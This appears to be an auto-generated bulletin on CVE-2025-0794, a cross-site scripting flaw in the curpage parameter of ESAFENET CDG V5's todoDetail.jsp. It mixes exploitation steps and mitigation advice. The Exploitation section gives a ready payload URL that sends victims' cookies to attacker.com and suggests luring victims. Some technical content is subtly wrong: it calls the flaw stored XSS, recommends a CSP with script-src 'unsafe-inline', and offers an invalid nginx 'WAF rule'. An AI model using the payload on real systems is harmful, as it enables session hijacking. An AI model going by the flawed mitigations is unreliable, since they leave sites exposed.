ESAFENET CDG V5, Cross-Site Scripting (XSS), CVE-2025-0794 (Medium)

Listen to this Post

How CVE-2025-0794 Works

The vulnerability exists in ESAFENET CDG V5 within the `/todoDetail.jsp` file. An attacker can exploit the `curpage` parameter to inject malicious JavaScript payloads due to insufficient input sanitization. When a user accesses a manipulated URL (e.g., https://target/todoDetail.jsp?curpage=<script>alert(1)</script>), the payload executes in the victim’s browser. This stored XSS attack persists across sessions, enabling session hijacking, defacement, or phishing. The lack of CSRF protection exacerbates the risk, allowing attackers to craft malicious links or embed exploits in third-party sites.

DailyCVE Form

Platform: ESAFENET CDG
Version: V5
Vulnerability: XSS
Severity: Medium
Date: 05/13/2025

What Undercode Say:

Exploitation

1. Craft a malicious URL:

https://target/todoDetail.jsp?curpage=<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>

2. Use social engineering to lure victims or embed the payload in forums.

Detection

Check for unsanitized `curpage` inputs:

// Test for XSS
alert(1);

Review server logs for suspicious GET requests:

grep "todoDetail.jsp?curpage=" /var/log/tomcat/access.log

Mitigation

1. Patch: Sanitize `curpage` with OWASP Java Encoder:

String safeCurpage = Encode.forHtml(request.getParameter("curpage"));

2. Deploy CSP headers:

Content-Security-Policy: default-src 'self'; script-src 'unsafe-inline'

3. WAF Rules:

location ~ todoDetail.jsp {
deny ~ "<script";
}

Analysis

  • CVSS 4.0: 5.3 (Medium)
  • Attack Vector: Network
  • Impact: Limited data leakage via JS execution.

References

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top